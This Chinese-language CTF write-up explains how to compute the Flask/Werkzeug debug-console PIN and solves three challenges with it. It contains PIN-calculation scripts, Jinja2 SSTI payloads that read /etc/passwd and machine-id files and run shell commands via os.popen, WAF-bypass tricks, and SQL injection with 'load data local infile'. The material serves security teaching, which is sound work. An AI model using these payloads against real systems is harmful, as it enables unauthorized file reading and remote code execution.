目录

Flask计算pin码

<1> 概念

什么是pin码?

pin码生成条件?

读取相关文件绕过过滤

<2> 源码分析

werkzeug 1.0.x版本 计算PIN的源码

 werkzeug 2.0.x版本 计算PIN的源码

<3> 计算生成pin的脚本

CTF中 flask-pin的应用

<1> CTFSHOW801(任意文件读取&pin计算)

<2>  [GYCTF2020]FlaskApp(SSTI&pin计算)

预期解 利用PIN码进行RCE

非预期解 SSTI rce

<3> [starCTF] oh-my-notepro(load data local infile读文件&pin计算)

Flask计算pin码

<1> 概念

什么是pin码?

pin码是 flask应用在开启debug的模式下,进入控制台调试模式下所需的进入密码。 相当于是 pyshell

pin码生成条件?

pin码有六个要素:

username 在可以任意文件读的条件下读 /etc/passwd进行猜测modname 一般是flask.appgetattr(app, "__name__", app.__class__.__name__)  一般是Flaskmoddir flask库下app.py的绝对路径    可以通过报错获取int(uuid,16)    即 当前网络的mac地址的十进制数get_machine_id()     机器的id

 六个元素 其中  uuid和 machine_id() 相比其他四个 是可能有变化的

在 python 中使用 uuid 模块生成 UUID(通用唯一识别码)。可以使用 uuid.getnode() 方法来获取计算机的硬件地址

网卡的mac地址的十进制,可以通过代码uuid.getnode()获得,也可以通过读取/sys/class/net/eth0/address获得,一般获取的是一串十六进制数,将其中的横杠去掉然后转十进制就行。

例:02:42:ac:02:f6:34  ->  342485376972340

 machine-id:

machine-id是通过三个文件里面的内容经过处理后拼接起来

对于非docker机,每台机器都有它唯一的machine-id,一般放在/etc/machine-id和/proc/sys/kernel/random/boot_id

对于docker机则读取/proc/self/cgroup,其中第一行的/docker/字符串后面的内容作为机器的id

非docker机,三个文件都需要读取

docker机 machine-id= /proc/sys/kernel/random/boot_id + /proc/self/cgroup里/docker/字符串后面的内容

读取相关文件绕过过滤

过滤了self的时候怎么读 machine-id

其中的self可以用相关进程的pid去替换,其实1就行过滤 cgroup

用mountinfo或者cpuset

<2> 源码分析

生成pin码的代码则是在werkzeug.debug.__init__.get_pin_and_cookie_name

本地的位置为:

Python目录\Lib\site-packages\werkzeug\debug

 github上也有对应版本的源码:

https://github.com/pallets/werkzeug/blob/1.0.x/src/werkzeug/debug/__init__.py

https://github.com/pallets/werkzeug/blob/2.1.x/src/werkzeug/debug/__init__.py

 源码如下,我们看着分析一下

werkzeug 1.0.x版本 计算PIN的源码

# A week

PIN_TIME = 60 * 60 * 24 * 7

def hash_pin(pin):

if isinstance(pin, text_type):

pin = pin.encode("utf-8", "replace")

return hashlib.md5(pin + b"shittysalt").hexdigest()[:12]

_machine_id = None

def get_machine_id():

global _machine_id

if _machine_id is not None:

return _machine_id

def _generate():

linux = b""

# machine-id is stable across boots, boot_id is not.

for filename in "/etc/machine-id", "/proc/sys/kernel/random/boot_id":

try:

with open(filename, "rb") as f:

value = f.readline().strip()

except IOError:

continue

if value:

linux += value

break

# Containers share the same machine id, add some cgroup

# information. This is used outside containers too but should be

# relatively stable across boots.

try:

with open("/proc/self/cgroup", "rb") as f:

linux += f.readline().strip().rpartition(b"/")[2]

except IOError:

pass

if linux:

return linux

# On OS X, use ioreg to get the computer's serial number.

try:

# subprocess may not be available, e.g. Google App Engine

# https://github.com/pallets/werkzeug/issues/925

from subprocess import Popen, PIPE

dump = Popen(

["ioreg", "-c", "IOPlatformExpertDevice", "-d", "2"], stdout=PIPE

).communicate()[0]

match = re.search(b'"serial-number" = <([^>]+)', dump)

if match is not None:

return match.group(1)

except (OSError, ImportError):

pass

# On Windows, use winreg to get the machine guid.

try:

import winreg as wr

except ImportError:

try:

import _winreg as wr

except ImportError:

wr = None

if wr is not None:

try:

with wr.OpenKey(

wr.HKEY_LOCAL_MACHINE,

"SOFTWARE\\Microsoft\\Cryptography",

0,

wr.KEY_READ | wr.KEY_WOW64_64KEY,

) as rk:

guid, guid_type = wr.QueryValueEx(rk, "MachineGuid")

if guid_type == wr.REG_SZ:

return guid.encode("utf-8")

return guid

except WindowsError:

pass

_machine_id = _generate()

return _machine_id

class _ConsoleFrame(object):

"""Helper class so that we can reuse the frame console code for the

standalone console.

"""

def __init__(self, namespace):

self.console = Console(namespace)

self.id = 0

def get_pin_and_cookie_name(app):

"""Given an application object this returns a semi-stable 9 digit pin

code and a random key. The hope is that this is stable between

restarts to not make debugging particularly frustrating. If the pin

was forcefully disabled this returns `None`.

Second item in the resulting tuple is the cookie name for remembering.

"""

pin = os.environ.get("WERKZEUG_DEBUG_PIN")

rv = None

num = None

# Pin was explicitly disabled

if pin == "off":

return None, None

# Pin was provided explicitly

if pin is not None and pin.replace("-", "").isdigit():

# If there are separators in the pin, return it directly

if "-" in pin:

rv = pin

else:

num = pin

modname = getattr(app, "__module__", app.__class__.__module__)

try:

# getuser imports the pwd module, which does not exist in Google

# App Engine. It may also raise a KeyError if the UID does not

# have a username, such as in Docker.

username = getpass.getuser()

except (ImportError, KeyError):

username = None

mod = sys.modules.get(modname)

# This information only exists to make the cookie unique on the

# computer, not as a security feature.

probably_public_bits = [

username,

modname,

getattr(app, "__name__", app.__class__.__name__),

getattr(mod, "__file__", None),

]

# This information is here to make it harder for an attacker to

# guess the cookie name. They are unlikely to be contained anywhere

# within the unauthenticated debug page.

private_bits = [str(uuid.getnode()), get_machine_id()]

h = hashlib.md5()

for bit in chain(probably_public_bits, private_bits):

if not bit:

continue

if isinstance(bit, text_type):

bit = bit.encode("utf-8")

h.update(bit)

h.update(b"cookiesalt")

cookie_name = "__wzd" + h.hexdigest()[:20]

# If we need to generate a pin we salt it a bit more so that we don't

# end up with the same value and generate out 9 digits

if num is None:

h.update(b"pinsalt")

num = ("%09d" % int(h.hexdigest(), 16))[:9]

# Format the pincode in groups of digits for easier remembering if

# we don't have a result yet.

if rv is None:

for group_size in 5, 4, 3:

if len(num) % group_size == 0:

rv = "-".join(

num[x : x + group_size].rjust(group_size, "0")

for x in range(0, len(num), group_size)

)

break

else:

rv = num

return rv, cookie_name

class DebuggedApplication(object):

"""Enables debugging support for a given application::

from werkzeug.debug import DebuggedApplication

from myapp import app

app = DebuggedApplication(app, evalex=True)

The `evalex` keyword argument allows evaluating expressions in a

traceback's frame context.

:param app: the WSGI application to run debugged.

:param evalex: enable exception evaluation feature (interactive

debugging). This requires a non-forking server.

:param request_key: The key that points to the request object in ths

environment. This parameter is ignored in current

versions.

:param console_path: the URL for a general purpose console.

:param console_init_func: the function that is executed before starting

the general purpose console. The return value

is used as initial namespace.

:param show_hidden_frames: by default hidden traceback frames are skipped.

You can show them by setting this parameter

to `True`.

:param pin_security: can be used to disable the pin based security system.

:param pin_logging: enables the logging of the pin system.

"""

def __init__(

self,

app,

evalex=False,

request_key="werkzeug.request",

console_path="/console",

console_init_func=None,

show_hidden_frames=False,

pin_security=True,

pin_logging=True,

):

if not console_init_func:

console_init_func = None

self.app = app

self.evalex = evalex

self.frames = {}

self.tracebacks = {}

self.request_key = request_key

self.console_path = console_path

self.console_init_func = console_init_func

self.show_hidden_frames = show_hidden_frames

self.secret = gen_salt(20)

self._failed_pin_auth = 0

self.pin_logging = pin_logging

if pin_security:

# Print out the pin for the debugger on standard out.

if os.environ.get("WERKZEUG_RUN_MAIN") == "true" and pin_logging:

_log("warning", " * Debugger is active!")

if self.pin is None:

_log("warning", " * Debugger PIN disabled. DEBUGGER UNSECURED!")

else:

_log("info", " * Debugger PIN: %s" % self.pin)

else:

self.pin = None

@property

def pin(self):

if not hasattr(self, "_pin"):

self._pin, self._pin_cookie = get_pin_and_cookie_name(self.app)

return self._pin

@pin.setter

def pin(self, value):

self._pin = value

@property

def pin_cookie_name(self):

"""The name of the pin cookie."""

if not hasattr(self, "_pin_cookie"):

self._pin, self._pin_cookie = get_pin_and_cookie_name(self.app)

return self._pin_cookie

def debug_application(self, environ, start_response):

"""Run the application and conserve the traceback frames."""

app_iter = None

try:

app_iter = self.app(environ, start_response)

for item in app_iter:

yield item

if hasattr(app_iter, "close"):

app_iter.close()

except Exception:

if hasattr(app_iter, "close"):

app_iter.close()

traceback = get_current_traceback(

skip=1,

show_hidden_frames=self.show_hidden_frames,

ignore_system_exceptions=True,

)

for frame in traceback.frames:

self.frames[frame.id] = frame

self.tracebacks[traceback.id] = traceback

try:

start_response(

"500 INTERNAL SERVER ERROR",

[

("Content-Type", "text/html; charset=utf-8"),

# Disable Chrome's XSS protection, the debug

# output can cause false-positives.

("X-XSS-Protection", "0"),

],

)

except Exception:

# if we end up here there has been output but an error

# occurred. in that situation we can do nothing fancy any

# more, better log something into the error log and fall

# back gracefully.

environ["wsgi.errors"].write(

"Debugging middleware caught exception in streamed "

"response at a point where response headers were already "

"sent.\n"

)

else:

is_trusted = bool(self.check_pin_trust(environ))

yield traceback.render_full(

evalex=self.evalex, evalex_trusted=is_trusted, secret=self.secret

).encode("utf-8", "replace")

traceback.log(environ["wsgi.errors"])

def execute_command(self, request, command, frame):

"""Execute a command in a console."""

return Response(frame.console.eval(command), mimetype="text/html")

def display_console(self, request):

"""Display a standalone shell."""

if 0 not in self.frames:

if self.console_init_func is None:

ns = {}

else:

ns = dict(self.console_init_func())

ns.setdefault("app", self.app)

self.frames[0] = _ConsoleFrame(ns)

is_trusted = bool(self.check_pin_trust(request.environ))

return Response(

render_console_html(secret=self.secret, evalex_trusted=is_trusted),

mimetype="text/html",

)

def paste_traceback(self, request, traceback):

"""Paste the traceback and return a JSON response."""

rv = traceback.paste()

return Response(json.dumps(rv), mimetype="application/json")

def get_resource(self, request, filename):

"""Return a static resource from the shared folder."""

filename = join("shared", basename(filename))

try:

data = pkgutil.get_data(__package__, filename)

except OSError:

data = None

if data is not None:

mimetype = mimetypes.guess_type(filename)[0] or "application/octet-stream"

return Response(data, mimetype=mimetype)

return Response("Not Found", status=404)

def check_pin_trust(self, environ):

"""Checks if the request passed the pin test. This returns `True` if the

request is trusted on a pin/cookie basis and returns `False` if not.

Additionally if the cookie's stored pin hash is wrong it will return

`None` so that appropriate action can be taken.

"""

if self.pin is None:

return True

val = parse_cookie(environ).get(self.pin_cookie_name)

if not val or "|" not in val:

return False

ts, pin_hash = val.split("|", 1)

if not ts.isdigit():

return False

if pin_hash != hash_pin(self.pin):

return None

return (time.time() - PIN_TIME) < int(ts)

def _fail_pin_auth(self):

time.sleep(5.0 if self._failed_pin_auth > 5 else 0.5)

self._failed_pin_auth += 1

def pin_auth(self, request):

"""Authenticates with the pin."""

exhausted = False

auth = False

trust = self.check_pin_trust(request.environ)

# If the trust return value is `None` it means that the cookie is

# set but the stored pin hash value is bad. This means that the

# pin was changed. In this case we count a bad auth and unset the

# cookie. This way it becomes harder to guess the cookie name

# instead of the pin as we still count up failures.

bad_cookie = False

if trust is None:

self._fail_pin_auth()

bad_cookie = True

# If we're trusted, we're authenticated.

elif trust:

auth = True

# If we failed too many times, then we're locked out.

elif self._failed_pin_auth > 10:

exhausted = True

# Otherwise go through pin based authentication

else:

entered_pin = request.args.get("pin")

if entered_pin.strip().replace("-", "") == self.pin.replace("-", ""):

self._failed_pin_auth = 0

auth = True

else:

self._fail_pin_auth()

rv = Response(

json.dumps({"auth": auth, "exhausted": exhausted}),

mimetype="application/json",

)

if auth:

rv.set_cookie(

self.pin_cookie_name,

"%s|%s" % (int(time.time()), hash_pin(self.pin)),

httponly=True,

)

elif bad_cookie:

rv.delete_cookie(self.pin_cookie_name)

return rv

def log_pin_request(self):

"""Log the pin if needed."""

if self.pin_logging and self.pin is not None:

_log(

"info", " * To enable the debugger you need to enter the security pin:"

)

_log("info", " * Debugger pin code: %s" % self.pin)

return Response("")

def __call__(self, environ, start_response):

"""Dispatch the requests."""

# important: don't ever access a function here that reads the incoming

# form data! Otherwise the application won't have access to that data

# any more!

request = Request(environ)

response = self.debug_application

if request.args.get("__debugger__") == "yes":

cmd = request.args.get("cmd")

arg = request.args.get("f")

secret = request.args.get("s")

traceback = self.tracebacks.get(request.args.get("tb", type=int))

frame = self.frames.get(request.args.get("frm", type=int))

if cmd == "resource" and arg:

response = self.get_resource(request, arg)

elif cmd == "paste" and traceback is not None and secret == self.secret:

response = self.paste_traceback(request, traceback)

elif cmd == "pinauth" and secret == self.secret:

response = self.pin_auth(request)

elif cmd == "printpin" and secret == self.secret:

response = self.log_pin_request()

elif (

self.evalex

and cmd is not None

and frame is not None

and self.secret == secret

and self.check_pin_trust(environ)

):

response = self.execute_command(request, cmd, frame)

elif (

self.evalex

and self.console_path is not None

and request.path == self.console_path

):

response = self.display_console(request)

return response(environ, start_response)

从hash_pin 函数可知  用的是 md5加密方式 :

        return hashlib.md5(pin + b"shittysalt").hexdigest()[:12]

 再来看看它是怎么 得到 machine-id的

def get_machine_id():

global _machine_id

if _machine_id is not None:

return _machine_id

def _generate():

linux = b""

# machine-id is stable across boots, boot_id is not.

for filename in "/etc/machine-id", "/proc/sys/kernel/random/boot_id":

try:

with open(filename, "rb") as f:

value = f.readline().strip()

except IOError:

continue

if value:

linux += value

break

# Containers share the same machine id, add some cgroup

# information. This is used outside containers too but should be

# relatively stable across boots.

try:

with open("/proc/self/cgroup", "rb") as f:

linux += f.readline().strip().rpartition(b"/")[2]

except IOError:

pass

if linux:

return linux

 可以看到 是 循环 按顺序去读取 /etc/machine-id   /proc/sys/kernel/random/boot_id文件的内容

如果 读到了 /etc/machine-id  赋给linux 就跳出循环  然后去读取 /proc/self/cgroup 文件内容,之后 linux+= 内容 拼接到后面,返回  如果没读到 /etc/machine-id  则会去读 /proc/sys/kernel/random/boot_id 文件内容,赋给linux 然后去读取 /proc/self/cgroup 文件内容,之后 linux+= 内容 拼接到后面,返回

 werkzeug 2.0.x版本 计算PIN的源码

 2.0版本 获取machine-id的方式和上面意义,不过hash利用从md5改为了sha1

# 前面导入库部分省略

# PIN有效时间,可以看到这里默认是一周时间

PIN_TIME = 60 * 60 * 24 * 7

def hash_pin(pin: str) -> str:

return hashlib.sha1(f"{pin} added salt".encode("utf-8", "replace")).hexdigest()[:12]

_machine_id: t.Optional[t.Union[str, bytes]] = None

# 获取机器id

def get_machine_id() -> t.Optional[t.Union[str, bytes]]:

def _generate() -> t.Optional[t.Union[str, bytes]]:

linux = b""

# !!!!!!!!

# 获取machine-id或/proc/sys/kernel/random/boot_id

# machine-id其实是机器绑定的一种id

# boot-id是操作系统的引导id

# docker容器里面可能没有machine-id

# 获取到其中一个值之后就break了,所以machine-id的优先级要高一些

for filename in "/etc/machine-id", "/proc/sys/kernel/random/boot_id":

try:

with open(filename, "rb") as f:

value = f.readline().strip()

except OSError:

continue

if value:

# 这里进行的是字符串拼接

linux += value

break

try:

with open("/proc/self/cgroup", "rb") as f:

linux += f.readline().strip().rpartition(b"/")[2]

# 获取docker的id

# 例如:11:perf_event:/docker/2f27f61d1db036c6ac46a9c6a8f10348ad2c43abfa97ffd979fbb1629adfa4c8

# 则只截取2f27f61d1db036c6ac46a9c6a8f10348ad2c43abfa97ffd979fbb1629adfa4c8拼接到后面

except OSError:

pass

if linux:

return linux

# OS系统的

{}

# 下面是windows的获取方法,由于使用得不多,可以先不管

if sys.platform == "win32":

{}

# 最终获取machine-id

_machine_id = _generate()

return _machine_id

# 总结一下,这个machine_id靠三个文件里面的内容拼接而成

class _ConsoleFrame:

def __init__(self, namespace: t.Dict[str, t.Any]):

self.console = Console(namespace)

self.id = 0

def get_pin_and_cookie_name(

app: "WSGIApplication",

) -> t.Union[t.Tuple[str, str], t.Tuple[None, None]]:

pin = os.environ.get("WERKZEUG_DEBUG_PIN")

# 获取环境变量WERKZEUG_DEBUG_PIN并赋值给pin

rv = None

num = None

# Pin was explicitly disabled

if pin == "off":

return None, None

# Pin was provided explicitly

if pin is not None and pin.replace("-", "").isdigit():

# If there are separators in the pin, return it directly

if "-" in pin:

rv = pin

else:

num = pin

# 使用getattr(app, "__module__", t.cast(object, app).__class__.__module__)获取modname,其默认值为flask.app

modname = getattr(app, "__module__", t.cast(object, app).__class__.__module__)

username: t.Optional[str]

try:

# 获取username的值通过getpass.getuser()

username = getpass.getuser()

except (ImportError, KeyError):

username = None

mod = sys.modules.get(modname)

# 此信息的存在只是为了使cookie在

# 计算机,而不是作为一个安全功能。

probably_public_bits = [

username,

modname,

getattr(app, "__name__", type(app).__name__),

getattr(mod, "__file__", None),

] # 这里又多获取了两个值,appname和moddir

# getattr(app, "__name__", type(app).__name__):appname,默认为Flask

# getattr(mod, "__file__", None):moddir,可以根据报错路径获取

# 这个信息是为了让攻击者更难

# 猜猜cookie的名字。它们不太可能被控制在任何地方

# 在未经身份验证的调试页面中。

private_bits = [str(uuid.getnode()), get_machine_id()]

# 获取uuid和machine-id,通过uuid.getnode()获得

h = hashlib.sha1()

# 使用sha1算法,这是python高版本和低版本算pin的主要区别

for bit in chain(probably_public_bits, private_bits):

if not bit:

continue

if isinstance(bit, str):

bit = bit.encode("utf-8")

h.update(bit)

h.update(b"cookiesalt")

cookie_name = f"__wzd{h.hexdigest()[:20]}"

# 如果我们需要做一个大头针,我们就多放点盐,这样就不会

# 以相同的值结束并生成9位数字

if num is None:

h.update(b"pinsalt")

num = f"{int(h.hexdigest(), 16):09d}"[:9]

# Format the pincode in groups of digits for easier remembering if

# we don't have a result yet.

if rv is None:

for group_size in 5, 4, 3:

if len(num) % group_size == 0:

rv = "-".join(

num[x : x + group_size].rjust(group_size, "0")

for x in range(0, len(num), group_size)

)

break

else:

rv = num

# 这就是主要的pin算法,脚本可以直接照抄这部分代码

return rv, cookie_name

 不同版本的werkzeug库的PIN计算方式不同,源码里后面一部分实际上就是计算的代码,把 public_bit 和 private_bit 列表里 六个元素的值改一下即可    现在更新之后 大部分就都用sha1算法了 老题目可能会使用md5算法

<3> 计算生成pin的脚本

低版本(werkzeug 1.0.x)

import hashlib

from itertools import chain

probably_public_bits = [

'root' # username 可通过/etc/passwd获取

'flask.app', # modname默认值

'Flask', # 默认值 getattr(app, '__name__', getattr(app.__class__, '__name__'))

'/usr/local/lib/python3.8/site-packages/flask/app.py' # 路径 可报错得到 getattr(mod, '__file__', None)

]

private_bits = [

'25214234362297', # /sys/class/net/eth0/address mac地址十进制

'0402a7ff83cc48b41b227763d03b386cb5040585c82f3b99aa3ad120ae69ebaa' # /etc/machine-id

]

# 下面为源码里面抄的,不需要修改

h = hashlib.md5()

for bit in chain(probably_public_bits, private_bits):

if not bit:

continue

if isinstance(bit, str):

bit = bit.encode('utf-8')

h.update(bit)

h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None

if num is None:

h.update(b'pinsalt')

num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None

if rv is None:

for group_size in 5, 4, 3:

if len(num) % group_size == 0:

rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')

for x in range(0, len(num), group_size))

break

else:

rv = num

print(rv)

高版本(werkzeug >= 2.0.x)

import hashlib

from itertools import chain

probably_public_bits = [

'ctf' # username 可通过/etc/passwd获取

'flask.app', # modname默认值

'Flask', # 默认值 getattr(app, '__name__', getattr(app.__class__, '__name__'))

'/usr/local/lib/python3.8/site-packages/flask/app.py' # 路径 可报错得到 getattr(mod, '__file__', None)

]

private_bits = [

'2485723332611', # /sys/class/net/eth0/address mac地址十进制

'96cec10d3d9307792745ec3b85c89620b10a06f1c0105bb2402a7e5d2e965c143de814597bafa25eeea9e79b7f6a7fb2'

# 字符串合并:首先读取文件内容 /etc/machine-id(docker不用看) /proc/sys/kernel/random/boot_id /proc/self/cgroup

# 有machine-id 那就拼接machine-id + /proc/self/cgroup 否则 /proc/sys/kernel/random/boot_id + /proc/self/cgroup

]

# 下面为源码里面抄的,不需要修改

h = hashlib.sha1()

for bit in chain(probably_public_bits, private_bits):

if not bit:

continue

if isinstance(bit, str):

bit = bit.encode('utf-8')

h.update(bit)

h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None

if num is None:

h.update(b'pinsalt')

num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None

if rv is None:

for group_size in 5, 4, 3:

if len(num) % group_size == 0:

rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')

for x in range(0, len(num), group_size))

break

else:

rv = num

print(rv)

CTF中 flask-pin的应用

<1> CTFSHOW801(任意文件读取&pin计算)

 进入题目 得到提示:

/file/filename=  处可以下载文件   同时开启了 debug

查看 /etc/passwd文件    root:x:0:0:root:/root:/bin/ash   username为root

查看 /sys/class/net/eth0/address   得到:02:42:ac:0c:94:e3  mac十进制为 2485377602787

查看  /proc/self/cgroup 得到:1:name=systemd:/docker/0d9d814928e85948f3038055a34d6cf66517e006e8a0e6ec53991f758d0ee6ba

查看  /proc/sys/kernel/random/boot_id  得到:26657bfd-2d70-45fa-97b3-99462feda893

所以 machine-id为: 26657bfd-2d70-45fa-97b3-99462feda8930d9d814928e85948f3038055a34d6cf66517e006e8a0e6ec53991f758d0ee6ba

通过报错 得到 app.py绝对路径为:/usr/local/lib/python3.8/site-packages/flask/app.py

利用脚本 计算flask的pin码

import hashlib

from itertools import chain

probably_public_bits = [

'root' # username 可通过/etc/passwd获取

'flask.app', # modname默认值

'Flask', # 默认值 getattr(app, '__name__', getattr(app.__class__, '__name__'))

'/usr/local/lib/python3.8/site-packages/flask/app.py' # 路径 可报错得到 getattr(mod, '__file__', None)

]

private_bits = [

'2485377602787', # /sys/class/net/eth0/address mac地址十进制

'26657bfd-2d70-45fa-97b3-99462feda8930d9d814928e85948f3038055a34d6cf66517e006e8a0e6ec53991f758d0ee6ba'

# 字符串合并:1./etc/machine-id(docker不用看) /proc/sys/kernel/random/boot_id,有boot-id那就拼接boot-id 2. /proc/self/cgroup

]

# 下面为源码里面抄的,不需要修改

h = hashlib.sha1()

for bit in chain(probably_public_bits, private_bits):

if not bit:

continue

if isinstance(bit, str):

bit = bit.encode('utf-8')

h.update(bit)

h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None

if num is None:

h.update(b'pinsalt')

num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None

if rv is None:

for group_size in 5, 4, 3:

if len(num) % group_size == 0:

rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')

for x in range(0, len(num), group_size))

break

else:

rv = num

print(rv)

 得到pin码为:435-430-822

/console 进入py 的shell    得到flag

<2>  [GYCTF2020]FlaskApp(SSTI&pin计算)

进入题目 得到三个路由  

/encode   对输入字符串进行 base64加密  输出加密内容/decode  对输入的字符串进行 base64解密 输出解密内容/hint 提示 PIN

 整理 /decode 当我们输入 {{1+1}} 的base64编码 会输出 2  应该存在ssti漏洞

同时 我们根据报错得知 开启了DEBUG  得到了 decode路由源码

 这里是直接将text参数进行base64解密之后就渲染出来   经过一个waf 然后渲染  参数可控

 可以直接找一个可用的payload,利用现成payload  读文件https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection

{% for i in ().__class__.__base__.__subclasses__() %}

{% if 'warning' in i.__name__ %}

{{ i.__init__.__globals__['__builtins__'].open('app.py','r').read() }}

{% endif %}

{% endfor %}

{% for i in ().__class__.__base__.__subclasses__() %}{% if 'warning' in i.__name__ %}{{ i.__init__.__globals__['__builtins__'].open('app.py','r').read() }}{% endif %}{% endfor %}

预期解 利用PIN码进行RCE

计算pin码 需要知道   flask用户名、machine_id 、mac地址16进制、flask库下app.py的绝对路径

其他两个一般为默认值 Flask和 flask.app

利用 flask ssti 的payload  读取文件

 读取/etc/passwd  得到flask用户名 flaskweb

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/etc/passwd','r').read() }}{% endif %}{% endfor %}

 读取 /sys/class/net/eth0/address  得到:96:9f:53:08:90:34   即 0x969f53089034  165611037036596

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/sys/class/net/eth0/address','r').read() }}{% endif %}{% endfor %}

根据报错 我们得知 flask app.py的绝对路径为:

/usr/local/lib/python3.7/site-packages/flask/app.py

读取 machine-id   

/etc/machine-id    1408f836b0ca514d796cbf8960e45fa1

/proc/sys/kernel/random/boot_id  867ab5d2-4e57-4335-811b-2943c662e936

/proc/self/cgroup   1:name=systemd:/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-pod1ea33ba4_b2af_43c0_8313_4caac142b19b.slice/docker-9fbfdeb9c7e67153b4af568d1ade6378c1b21ed1ca3b314288881a609599bc3b.scope

这里是 k8s启动的环境  试了很多 没有满足情况的machine-id 。。。。 环境有点问题

正常是 docker的环境的话  machine-id = /proc/sys/kernel/random/boot_id + /proc/self/cgroup里/docker后面的内容

然后算pin码的脚本 算出来pin码  访问/console 提交进入pyshell

>>>import os

>>>os.popen('/flag').read()

即可

非预期解 SSTI rce

利用 payload 读取一下源码

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}{% endif %}{% endfor %}

得到源码 和 waf

from flask import Flask,render_template_string

from flask import render_template,request,flash,redirect,url_for

from flask_wtf import FlaskForm

from wtforms import StringField, SubmitField

from wtforms.validators import DataRequired

from flask_bootstrap import Bootstrap

import base64

app = Flask(__name__)

app.config['SECRET_KEY'] = 's_e_c_r_e_t_k_e_y'

bootstrap = Bootstrap(app)

class NameForm(FlaskForm):

text = StringField('BASE64加密',validators= [DataRequired()])

submit = SubmitField('提交')

class NameForm1(FlaskForm):

text = StringField('BASE64解密',validators= [DataRequired()])

submit = SubmitField('提交')

def waf(str):

black_list = ["flag","os","system","popen","import","eval","chr","request","subprocess","commands","socket","hex","base64","*","?"]

for x in black_list :

if x in str.lower() :

return 1

@app.route('/hint',methods=['GET'])

def hint(): txt = "失败乃成功之母!!"

return render_template("hint.html",txt = txt) @app.route('/',methods=['POST','GET']) def encode():

if request.values.get('text') :

text = request.values.get("text")

text_decode = base64.b64encode(text.encode())

tmp = "结果 :{0}".format(str(text_decode.decode()))

res = render_template_string(tmp)

flash(tmp)

return redirect(url_for('encode'))

else :

text = ""

form = NameForm(text)

return render_template("index.html",form = form ,method = "加密" ,img ="flask.png")

@app.route('/decode',methods=['POST','GET'])

def decode():

if request.values.get('text') :

text = request.values.get("text")

text_decode = base64.b64decode(text.encode())

tmp = "结果 : {0}".format(text_decode.decode())

if waf(tmp) :

flash("no no no !!")

return redirect(url_for('decode')) res = render_template_string(tmp) flash(res)

return redirect(url_for('decode'))

else :

text = "" form = NameForm1(text)

return render_template("index.html",form = form, method = "解密" , img ="flask1.png")

@app.route('/',methods=['GET'])

def not_found(name):

return render_template("404.html",name = name)

if __name__ == '__main__':

app.run(host="0.0.0.0", port=5000, debug=True)

waf 过滤了 "flag","os","system","popen","import","eval","chr","request","subprocess","commands","socket","hex","base64","*","?"

可以字符串拼接绕过

查看 根目录文件  

{%print lipsum.__globals__['__bui'+'ltins__']['__im'+'port__']('o'+'s')['po'+'pen']('ls /').read()%}

或者

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__im'+'port__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}

得到 :app bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys this_is_the_flag.txt tmp usr var

读取flag文件

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__im'+'port__']('o'+'s')['po'+'pen']('cat /this_is_the_fl'+'ag.txt').read()}}{% endif %}{% endfor %}

{% for i in ().__class__.__base__.__subclasses__() %}{% if 'warning' in i.__name__ %}{{ i.__init__.__globals__['__builtins__'].open('/this_is_the_fl'+'ag.txt','r').read() }}{% endif %}{% endfor %}

{%print lipsum.__globals__['__bui'+'ltins__']['__im'+'port__']('o'+'s')['po'+'pen']('cat /this_is_the_fl'+'ag.txt').read()%}

<3> [starCTF] oh-my-notepro(load data local infile读文件&pin计算)

环境在 https://github.com/sixstars/starctf2022/tree/main/web-oh-my-notepro/docker

docker-compose up -d启动即可

注:启动环境之后可能会报错

ArgumentError  sqlalchemy.exc.ArgumentError: Textual SQL expression 'select * from notes where...' should be explicitly declared as text('select * from notes where...')

这是由于  sqlalchmy的版本问题

解决方法:修改容器里app.py里的 sql = f"select * from notes where note_id='{note_id}'"  为  sql = text(f"select * from notes where note_id='{note_id}'")

又报错:

NameError: name 'text' is not defined

app.py里 前面加上

from sqlalchemy import text  即可

 进入题目,随便输入 在完成登录以后,发现是一个note记录板,每个登录用户在/create创建note点击之后 会访问/view?note_id=去查看note,?note_id=1 报错发现有flask wsgi 的debug信息

访问 /console 发现需要输入pin码 开启了debug  那这道题应该就是计算出flask的pin码进行rce

 同时报错中得到一部分源码:

def login_required(f):

@wraps(f)

def decorated_function(*args, **kws):

if not session.get("username"):

return redirect(url_for('login'))

return f(*args, **kws)

return decorated_function

def get_random_id():

alphabet = list(string.ascii_lowercase + string.digits)

@login_required

def view():

note_id = request.args.get("note_id")

sql = f"select * from notes where note_id='{note_id}'"

print(sql)

result = db.session.execute(sql, params={"multi":True})

db.session.commit()

result = result.fetchone()

data = {

'title': result[4],

'text': result[3],

}

return render_template('note.html', data=data)

重点关注 /view 路由里 这几段代码

result = db.session.execute(sql, params={"multi":True})

db.session.commit()

result = result.fetchone()

data = {

'title': result[4],

'text': result[3],

}

存在sql注入,result 回显位为 4和5  

1' order by 5%23  1' order by 6%23 报错 得知有 5列

1' union select 1,2,3,database(),version()%23  得到 database()=ctf  version()=5.6.51

得到了mysql 版本为5.6.51 高版本的mysql默认是没有权限使用load_file命令的,但是可以使用load data local infile into table,导入文件数据到表中,然后再打印这个表中的数据,payload如下:

create table table_name(data varchar(1000));

load data local infile "文件目录" into table {tmp_database}.table_name;

SELECT group_concat(data) from {tmp_database}.table_name;

